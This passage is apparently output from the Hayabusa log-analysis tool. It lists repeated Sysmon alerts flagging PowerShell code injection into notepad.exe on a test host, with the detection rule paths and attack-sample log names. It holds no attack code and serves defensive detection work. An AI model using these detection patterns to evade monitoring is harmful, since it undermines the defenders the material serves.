365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.223 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.223 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.239 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.239 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.239 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.270 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.270 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.270 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.286 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.286 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.286 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.301 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.301 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.301 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.317 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.317 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.317 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.348 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.348 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.348 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.364 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.364 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.364 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.380 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.380 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.380 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.395 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.395 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.395 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.426 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.426 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.426 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.442 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.442 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.442 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.489 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.489 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.489 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.505 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.505 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.505 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.520 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.520 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.520 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.536 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.536 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.536 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.551 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.551 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.551 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.567 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.567 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.567 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.567 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.567 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.567 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.583 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.583 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.583 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.598 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.598 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.598 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.614 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.614 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.614 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.661 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.661 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.661 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.708 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.708 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code 